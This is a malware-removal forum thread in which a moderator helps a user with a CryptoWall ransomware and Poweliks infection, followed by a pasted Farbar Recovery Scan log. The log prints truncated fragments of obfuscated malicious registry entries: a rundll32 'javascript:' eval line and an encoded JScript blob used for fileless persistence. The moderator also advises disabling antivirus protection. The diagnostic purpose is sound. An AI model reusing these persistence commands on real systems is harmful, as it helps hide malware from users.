
Help decrypt_png

Discussion in 'Virus & Other Malware Removal' started by chron104, Mar 27, 2015.

  1. chron104

    chron104 Thread Starter

    Joined:
    Mar 27, 2015
    Messages:
    63
    Tech Support Guy System Info Utility version 1.0.0.2
    OS Version: Microsoft Windows XP Home Edition, Service Pack 3, 32 bit
    Processor: Intel(R) Pentium(R) 4 CPU 3.00GHz, x86 Family 15 Model 2 Stepping 9
    Processor Count: 1
    RAM: 2559 Mb
    Graphics Card: NVIDIA GeForce FX 5200 (Microsoft Corporation), 512 Mb
    Hard Drives: C: Total - 953859 MB, Free - 588501 MB; D: Total - 114400 MB, Free - 114321 MB;
    Motherboard: Dell Computer Corp., 0U2424
    Antivirus: AVG update module, Updated: Yes, On-Demand Scanner: Enabled



    Hello everyone. I am new to this forum and am attempting to get help to repair my computer.
    Situation as of 2/2/15:


    My computer was infected with HELP_DECRIPT.PNG. Supposedly all cleared by McAfee, but viral programs/code still exist on the computer and my computer is not performing as it originally was prior to the infection. Infection occurred on about 1/25/15. Most of my document files and pictures located on my hard drive as well as my external hard drive were corrupted and encrypted by this virus. I deleted as many of the decrypt files as I was able to find, running a search term of "decrypt", and whatever came up I deleted. I have downloaded Malwarebytes and AVG as well, and the computer is still running slow and getting ACCESS DENIED ERROR MESSAGES, YOUR CURRENT SECURITY SETTINGS DO NOT ALLOW YOU TO DOWNLOAD THIS FILE (KEEP IN MIND THAT I HAVE ADMINISTRATOR PRIVILEGES), the exhaust fans in the computer are constantly running high non-stop, McAfee is always finding trojans on a daily basis, asks for restart after virus detection but then virus detection shows up again. Especially for this one: "c:\windows\system32\windowspowershell\v1.0\powershell.exe" (TROJAN-POWELIKE). I know I saw you guys resolve the same problem on your site for someone named "GROWLINGDOG" and you guys apparently fixed the problem. I do have some trust issues regarding downloading software from forums, but I have no choice right about now. Please help me get rid of this virus once and for all. I will definitely be grateful for your help. This has cost me hugely in time, frustration, and effort, as well as the loss of all my pics. I don't know why McAfee did not show up in the SYSINFO. Thank you.
     
  2. JSntgRvr

    JSntgRvr Retired Moderator and Malware Specialist

    Joined:
    Jul 1, 2003
    Messages:
    18,552
    First Name:
    José
    Hi and welcome. :)

    Unfortunately, we are still unable to reverse the damage done by this virus. All your files, in all drives, are encrypted, but there is no easy way to decrypt these files. You can read about this virus here:

    http://www.bleepingcomputer.com/virus-removal/cryptowall-ransomware-information#restore

    BleepingComputer.com has created a small utility that will find the Registry key created by CryptoWall and then export its list of encrypted files to a text file for you. This tool will also allow you to backup the encrypted files to another location in the event that you want to archive the encrypted files and reformat the machine. If you wish to generate a list of files that have been encrypted, you can download the ListCWall tool.

    There is an active CryptoWall support topic, which contains discussion and the experiences of a variety of IT consultants, end users, and companies who have been affected by CryptoWall. If you are interested in this infection or wish to ask questions about it, please visit the CryptoWall support topic. Once at the topic, and if you are a member, you can ask or answer questions and subscribe in order to get notifications when someone adds more information to the topic.

    http://www.bleepingcomputer.com/forums/t/532879/cryptowall-new-variant-of-cryptodefense/


    IDTool:

    Scan with IDTool

    Please download IDTool by Nathan and save the file to the desktop.
    It will come as a zipped file, so you will need to unzip it. You may do it by right-clicking on it and choosing Extract All. Extract it to your desktop.
    • Enter the IDTool directory, right-click on the icon and select Run as Administrator to start the tool.
    • IDTool needs the Microsoft .NET Framework environment to work properly, so if prompted to download & install it, please agree.
    • Wait patiently until the tool has collected the necessary data.
    • Once the main console is loaded, please press Rescan Computer and Generate a New Report.
    • When prompted at the main bar that Rescan is completed, press Generate Text Friendly Report for Forums.
    • Copy the entire content of the frame that appears. You may want to save it to a text file for your convenience.
    Please include that in your next reply.

    Please download Farbar Recovery Scan Tool and save it to your desktop.

    Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.
    • Double-click to run it. When the tool opens, click Yes to the disclaimer.
    • Make sure that under Optional Scans, there is a checkmark on Addition.txt and Shortcut.
    • Press the Scan button.
    • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
    • The tool will also produce another two logs (Addition.txt and Shortcut.txt). Please attach these to your reply.
     
  3. chron104

    Is there any reason why McAfee is detecting the IDTOOL I just downloaded and extracted as a trojan? It's being detected as an ARTEMIS... I may be a bit paranoid, which I had indicated about downloads, but is this file safe?
     
  4. JSntgRvr

    It is the real deal. Turn off McAfee realtime protection while using the IDTool.
     
  5. chron104

    OK. Will do it now. Thanks for your response.
     
  6. JSntgRvr

  7. chron104

    This is the report that was generated after running IDTOOLS !!!

    Infection Detection Tool v1.6 - Nathan Scott
    --------------------------------------------
    Date/Time: 3/28/2015 7:44:19 PM
    Operating System: Windows XP
    Service Pack: Service Pack 3
    Version Number: 5.1
    Product Type: Workstation
    --------------------------------------------
    [Detected Flags]
    1.| Possible CryptoWall Flag , HKCU\Software\E964BA5E9E6F7FF40E8BC453FA79D3AC\03345789AABCCDEF
     
  8. JSntgRvr

    It is definitely CryptoWall. You can list the files that have been encrypted by running this tool.
     
  9. chron104

    These are the results of the FRST listed below...

    Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 11-03-2015
    Ran by RAUL_104 (administrator) on RAUL-104 on 28-03-2015 19:50:54
    Running from C:\Documents and Settings\RAUL_104\My Documents\Downloads
    Loaded Profiles: RAUL_104 (Available profiles: RAUL_104 & RAUL_106 & AMY_106 & AMY_1061 & Administrator & Guest)
    Platform: Microsoft Windows XP Home Edition Service Pack 3 (X86) OS Language: English (United States)
    Internet Explorer Version 8 (Default browser: IE)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (AVG Technologies CZ, s.r.o.) C:\PROGRA~1\AVG\AVG2015\avgrsx.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgcsrvx.exe
    (ATI Technologies Inc.) C:\WINDOWS\system32\ati2evxx.exe
    (ATI Technologies Inc.) C:\WINDOWS\system32\ati2evxx.exe
    (ABBYY) C:\Program Files\Common Files\ABBYY\FineReader\11.00\Licensing\CE\NetworkLicenseServer.exe
    (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgidsagent.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgwdsvc.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Creative Technology Ltd) C:\WINDOWS\system32\CTSVCCDA.EXE
    () C:\WINDOWS\system32\spool\drivers\w32x86\3\dleaserv.exe
    ( ) C:\WINDOWS\system32\dleacoms.exe
    () C:\Program Files\Flip Video\FlipShare\FlipShareService.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgnsx.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgemcx.exe
    (iolo technologies, LLC) C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe
    (Logitech Inc.) C:\Program Files\Common Files\LogiShrd\LVMVFM\LVPrcSrv.exe
    (McAfee, Inc.) C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
    (McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
    (iolo technologies, LLC) C:\Program Files\iolo\System Mechanic\LiveBoost.exe
    (CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
    (Creative Technology Ltd) C:\Program Files\Creative\SBAudigy2\Surround Mixer\CTSysVol.exe
    (Creative Technology Ltd) C:\WINDOWS\system32\CTHELPER.EXE
    (Memeo) C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe
    (CyberLink Corp.) C:\Program Files\Dell\Media Experience\PCMService.exe
    () C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe
    (WDC) C:\Program Files\Western Digital\WD Drive Manager\WDBtnMgrUI.exe
    (Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
    () C:\Program Files\Dell V310-V510 Series\dleamon.exe
    () C:\Program Files\Dell V310-V510 Series\ezprint.exe
    () C:\Program Files\DivX\DivX Update\DivXUpdate.exe
    (Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
    (McAfee, Inc.) C:\WINDOWS\system32\mfevtps.exe
    (Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
    (Samsung Electronics Co., Ltd.) C:\Program Files\SAMSUNG\Kies\KiesTrayAgent.exe
    () C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe
    (iolo technologies, LLC) C:\Program Files\iolo\System Mechanic\ioloGovernor.exe
    () C:\Program Files\Common Files\LogiShrd\LQCVFX\COCIManager.exe
    (McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe
    (AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2015\avgui.exe
    (Nero AG) C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe
    () C:\Program Files\Motorola\MotoHelper\MotoHelperAgent.exe
    (Prolific Technology Inc.) C:\Program Files\Nero\Nero BackItUp 4\IoctlSvc.exe
    (Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
    (Viewpoint Corporation) C:\Program Files\Viewpoint\Common\ViewpointService.exe
    (WDC) C:\Program Files\Western Digital\WD Drive Manager\WDBtnMgrSvc.exe
    (Microsoft Corporation) C:\WINDOWS\system32\MsPMSPSv.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
    (GEMTEKS) C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\WLService.exe
    (Linksys) C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\WUSB54GC.exe
    (McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
    (McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe
    (Logitech Inc.) C:\Program Files\Logitech\Vid HD\Vid.exe
    (McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe
    (Samsung) C:\Program Files\SAMSUNG\Kies\External\FirmwareUpdate\KiesPDLR.exe
    (Samsung Electronics) C:\Program Files\SAMSUNG\Kies\KiesAirMessage.exe
    (Dell) C:\Documents and Settings\RAUL_104\Local Settings\Apps\2.0\POD3HEHV.4EL\OAXDQMD5.Q3D\dell..tion_0f612f649c4a10af_0005.0006_f9e15713f5aac8ac\DellSystemDetect.exe
    (Microsoft Corporation) C:\Program Files\Messenger\msmsgs.exe
    (ArcSoft, Inc.) C:\Program Files\My Book\WD Backup\uBBMonitor.exe
    (WinZip Computing, S.L.) C:\Program Files\WinZip\WZQKPICK.EXE
    (BackWeb Technologies Inc. ) C:\DOCUME~1\RAUL_104\LOCALS~1\Temp\bwgo0003a7ab.exe
    (Microsoft Corporation) C:\WINDOWS\system32\wbem\unsecapp.exe
    (Microsoft Corporation) C:\WINDOWS\system32\rundll32.exe
    (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
    (Microsoft Corporation) C:\WINDOWS\system32\windowspowershell\v1.0\powershell.exe
    (Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
    (NathanScott Apps) C:\Documents and Settings\RAUL_104\Local Settings\Application Data\IDTool\IDTool.exe


    ==================== Registry (Whitelisted) ==================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [124200 2007-09-17] (CyberLink Corp.)
    HKLM\...\Run: [CTSysVol] => C:\Program Files\Creative\SBAudigy2\Surround Mixer\CTSysVol.exe [49152 2002-10-29] (Creative Technology Ltd)
    HKLM\...\Run: [CTHelper] => C:\WINDOWS\system32\CTHELPER.EXE [28672 2003-02-20] (Creative Technology Ltd)
    HKLM\...\Run: [AsioReg] => "REGSVR32.EXE" /S CTASIO.DLL
    HKLM\...\Run: [UpdReg] => C:\WINDOWS\UpdReg.EXE [90112 2000-05-11] (Creative Technology Ltd.)
    HKLM\...\Run: [PCMService] => C:\Program Files\Dell\Media Experience\PCMService.exe [290816 2004-04-11] (CyberLink Corp.)
    HKLM\...\Run: [Share-to-Web Namespace Daemon] => C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe [69632 2002-04-17] (Hewlett-Packard)
    HKLM\...\Run: [WD Button Manager] => "WDBtnMgr.exe"
    HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [866584 2006-11-03] (Microsoft Corporation)
    HKLM\...\Run: [LogitechQuickCamRibbon] => C:\Program Files\Logitech\Logitech WebCam Software\LWS.exe [2793304 2009-10-14] ()
    HKLM\...\Run: [WD Drive Manager] => C:\Program Files\Western Digital\WD Drive Manager\WDBtnMgrUI.exe [450560 2009-05-27] (WDC)
    HKLM\...\Run: [WD Anywhere Backup] => C:\Program Files\WD\WD Anywhere Backup\MemeoLauncher2.exe [197856 2009-04-17] (Memeo Inc.)
    HKLM\...\Run: [NBKeyScan] => C:\Program Files\Nero\Nero BackItUp 4\NBKeyScan.exe [2254120 2008-09-24] (Nero AG)
    HKLM\...\Run: [IntelliPoint] => C:\Program Files\Microsoft IntelliPoint\ipoint.exe [1468296 2009-05-26] (Microsoft Corporation)
    HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-05-27] (Advanced Micro Devices, Inc.)
    HKLM\...\Run: [dleamon.exe] => C:\Program Files\Dell V310-V510 Series\dleamon.exe [770728 2011-01-23] ()
    HKLM\...\Run: [EzPrint] => C:\Program Files\Dell V310-V510 Series\ezprint.exe [139944 2011-01-23] ()
    HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [47904 2010-12-14] (Apple Inc.)
    HKLM\...\Run: [DivXUpdate] => C:\Program Files\DivX\DivX Update\DivXUpdate.exe [1259376 2011-07-28] ()
    HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-11-28] (Apple Inc.)
    HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [600928 2010-06-01] (Sony Corporation)
    HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
    HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [151952 2012-11-29] (Apple Inc.)
    HKLM\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)
    HKLM\...\Run: [KiesTrayAgent] => C:\Program Files\Samsung\Kies\KiesTrayAgent.exe [309688 2012-10-11] (Samsung Electronics Co., Ltd.)
    HKLM\...\Run: [ioloGovernor] => C:\Program Files\iolo\System Mechanic\ioloGovernor.exe [870224 2014-08-13] (iolo technologies, LLC)
    HKLM\...\Run: [Bonus.SSR.FR11] => C:\Program Files\ABBYY FineReader 11\Bonus.ScreenshotReader.exe [933640 2012-01-19] (ABBYY.)
    HKLM\...\Run: [ArcSoft Connection Service] => C:\Program Files\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe [207424 2010-10-27] (ArcSoft Inc.)
    HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\qttask.exe [421888 2012-10-25] (Apple Inc.)
    HKLM\...\Run: [UserFaultCheck] => %systemroot%\system32\dumprep 0 -u
    HKLM\...\Run: [atolpphm] => C:\WINDOWS\System32\atolpphm.exe
    HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2015\avgui.exe [3710416 2015-02-19] (AVG Technologies CZ, s.r.o.)
    Winlogon\Notify\AtiExtEvent: C:\WINDOWS\system32\Ati2evxx.dll (ATI Technologies Inc.)
    HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 224 more characters). <==== ATTENTION!
    HKLM\...99B7938DA9E4}\LocalServer32: [a] #@~^A4EAAA==n{[email protected]#@&l{xAPzmOk7+p6(L+1O`r?1.rwDRUtnVsE*[email protected]#@&S4k^+cne'[email protected]#@&`@#@&[email protected]#@&i @#@&di (the data entry has 32951 more characters). <==== ATTENTION!
    HKLM\...\Policies\Explorer: [NoCDBurning] 0
    HKLM\...\Policies\Explorer: [NoControlPanel] 0
    HKLM\...\Policies\Explorer: [NoFolderOptions] 0
    HKLM\...\Policies\Explorer: [TaskbarNoNotification] 1
    HKLM\...\Policies\Explorer: [HideSCAHealth] 1
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [Google Update] => C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [107912 2014-10-21] (Google Inc.)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [SB Audigy 2 Startup Menu] => /L:ENG
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [AnyDVD] => C:\Program Files\SlySoft\AnyDVD\AnyDVDtray.exe [3193792 2009-12-11] (SlySoft, Inc.)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [Logitech Vid] => C:\Program Files\Logitech\Vid HD\Vid.exe [5915480 2010-10-29] (Logitech Inc.)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [] => C:\Program Files\Samsung\Kies\External\FirmwareUpdate\KiesPDLR.exe [842680 2012-10-11] (Samsung)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [KiesPreload] => C:\Program Files\Samsung\Kies\Kies.exe [966072 2012-10-11] (Samsung)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [KiesAirMessage] => C:\Program Files\Samsung\Kies\KiesAirMessage.exe [580096 2012-10-09] (Samsung Electronics)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [DellSystemDetect] => C:\Documents and Settings\RAUL_104\Local Settings\Apps\2.0\POD3HEHV.4EL\OAXDQMD5.Q3D\dell..tion_0f612f649c4a10af_0005.0006_f9e15713f5aac8ac\DellSystemDetect.exe [258160 2014-04-05] (Dell)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [MSMSGS] => C:\Program Files\Messenger\msmsgs.exe [1695232 2008-04-13] (Microsoft Corporation)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [atolpphm] => C:\Documents and Settings\RAUL_104\atolpphm.exe
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [msnmsgr] => C:\Program Files\MSN Messenger\msnmsgr.exe [6856704 2007-09-04] (Microsoft Corporation)
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [AgentUpdate] => C:\WINDOWS\system32\regsvr32.exe /s "C:\Documents and Settings\RAUL_104\Application Data\Microsoft\Crypto\RSA\S-1-5-21-3915684212-1830115506-383142685-1006\cert_v95_0.tpa"
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Run: [CryptoUpdate] => C:\WINDOWS\system32\regsvr32.exe /s "C:\Documents and Settings\RAUL_104\Application Data\Microsoft\Crypto\RSA\cert_v95_0.tpl"
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Policies\Explorer\Run: [2096056239] => C:\DOCUME~1\RAUL_104\APPLIC~1\msitsxr.exe
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Policies\Explorer: [TaskbarNoNotification] 1
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Policies\Explorer: [HideSCAHealth] 1
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Policies\Explorer: [NoFolderOptions] 0
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Policies\Explorer: [NoControlPanel] 0
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\MountPoints2: {2ed4db3c-0410-11df-be50-00226ba62c8c} - H:\LaunchU3.exe -a
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\MountPoints2: {2ed4db3e-0410-11df-be50-00226ba62c8c} - G:\Setup_FlipShare.exe
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\MountPoints2: {4f6dfe74-57ca-11de-bd66-00226ba62c8c} - I:\LaunchU3.exe -a
    HKU\S-1-5-21-515967899-117609710-839522115-1004\...\MountPoints2: {dffbf3f7-2974-11e2-949a-00226ba62c8c} - I:\setup.exe -a
    HKU\S-1-5-18\...\Run: [DWQueuedReporting] => C:\Program Files\Common Files\Microsoft Shared\DW\DWTRIG20.EXE [434080 2011-07-27] (Microsoft Corporation)
    HKU\S-1-5-18\...\Policies\Explorer: [NoFolderOptions] 0
    HKU\S-1-5-18\...\Policies\Explorer: [NoControlPanel] 0
    Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Logitech Desktop Messenger.lnk
    ShortcutTarget: Logitech Desktop Messenger.lnk -> C:\Program Files\Logitech\Desktop Messenger\8876480\Program\LogitechDesktopMessenger.exe (Logitech Inc.)
    Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WD Backup Monitor.lnk
    ShortcutTarget: WD Backup Monitor.lnk -> C:\Program Files\My Book\WD Backup\uBBMonitor.exe (ArcSoft, Inc.)
    Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\WinZip Quick Pick.lnk
    ShortcutTarget: WinZip Quick Pick.lnk -> C:\Program Files\WinZip\WZQKPICK.EXE (WinZip Computing, S.L.)
    Startup: C:\Documents and Settings\AMY_106\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
    ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
    Startup: C:\Documents and Settings\AMY_1061\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
    ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
    Startup: C:\Documents and Settings\RAUL_106\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
    ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
    BootExecute: autocheck autochk * C:\PROGRA~1\AVG\AVG2015\avgrsx.exe /sync /restart

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-21-515967899-117609710-839522115-1004\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-21-515967899-117609710-839522115-1004\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
    BHO: Dell Toolbar -> {09B71986-2AC5-482d-B6CB-42EA34F4F85B} -> C:\Program Files\Dell Toolbar\toolband.dll [2008-12-10] ()
    BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-12-18] (Adobe Systems Incorporated)
    BHO: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll [2011-12-12] (DivX, LLC)
    BHO: No Name -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> No File
    BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2013-09-08] (Oracle Corporation)
    BHO: No Name -> {9CB65201-89C4-402c-BA80-02D8C59F9B1D} -> No File
    BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-03] (Google Inc.)
    BHO: Skype Browser Helper -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2013-10-09] (Skype Technologies S.A.)
    BHO: Google Toolbar Notifier BHO -> {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} -> C:\Program Files\Google\GoogleToolbarNotifier\5.10.11023.1534\swg.dll [2015-03-03] (Google Inc.)
    BHO: McAfee SiteAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2015-03-11] (McAfee, Inc.)
    BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-09-08] (Oracle Corporation)
    BHO: No Name -> {FE063DB1-4EC0-403e-8DD8-394C54984B2C} -> No File
    Toolbar: HKLM - No Name - {FE063DB9-4EC0-403e-8DD8-394C54984B2C} - No File
    Toolbar: HKLM - Dell Toolbar - {09B71986-2AC5-482d-B6CB-42EA34F4F85B} - C:\Program Files\Dell Toolbar\toolband.dll [2008-12-10] ()
    Toolbar: HKLM - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2015-03-11] (McAfee, Inc.)
    Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-03] (Google Inc.)
    Toolbar: HKU\S-1-5-21-515967899-117609710-839522115-1004 -> No Name - {FE063DB9-4EC0-403E-8DD8-394C54984B2C} - No File
    Toolbar: HKU\S-1-5-21-515967899-117609710-839522115-1004 -> No Name - {D4027C7F-154A-4066-A1AD-4243D8127440} - No File
    Toolbar: HKU\S-1-5-21-515967899-117609710-839522115-1004 -> Dell Toolbar - {09B71986-2AC5-482D-B6CB-42EA34F4F85B} - C:\Program Files\Dell Toolbar\toolband.dll [2008-12-10] ()
    Toolbar: HKU\S-1-5-21-515967899-117609710-839522115-1004 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2015-03-03] (Google Inc.)
    DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/_layouts/ClientBin/ieawsdc32.cab
    DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
    DPF: {16F67783-7E72-4C39-99C4-4780A8335484} http://www.syncmyride.com/Own/Modules/UpdateCenter/applets/sync.cab
    DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/downl...-48D9-9B0E-1719D1177202/LegitCheckControl.cab
    DPF: {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} https://support.dell.com/systemprofiler/SysProExe.CAB
    DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.macromedia.com/get/flashplayer/current/polarbear/ultrashim.cab
    DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    DPF: {E534E95D-4D69-4209-9DD0-D95BD20F9246} file:///F:/GxWebClient.cab
    DPF: {FC11A119-C2F7-46F4-9E32-937ABA26816E} file:///E:/CDVIEWER/CdViewer.cab
    Handler: bwfile-8876480 - {9462A756-7B47-47BC-8C80-C34B9B80B32B} - C:\Program Files\Logitech\Desktop Messenger\8876480\Program\GAPlugProtocol-8876480.dll [2011-05-28] (Logitech Inc.)
    Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2015-03-11] (McAfee, Inc.)
    Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files\McAfee\SiteAdvisor\McIEPlg.dll [2015-03-11] (McAfee, Inc.)
    Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2013-10-09] (Skype Technologies S.A.)
    Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
    Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll [2014-04-25] (McAfee, Inc.)
    ShellExecuteHooks: Microsoft AntiMalware ShellExecuteHook - {091EB208-39DD-417D-A5DD-7E2C2D8FB9CB} - C:\Program Files\Windows Defender\MpShHook.dll [83224 2006-11-03] (Microsoft Corporation)
    Winsock: Catalog5 04 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
    Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

    FireFox:
    ========
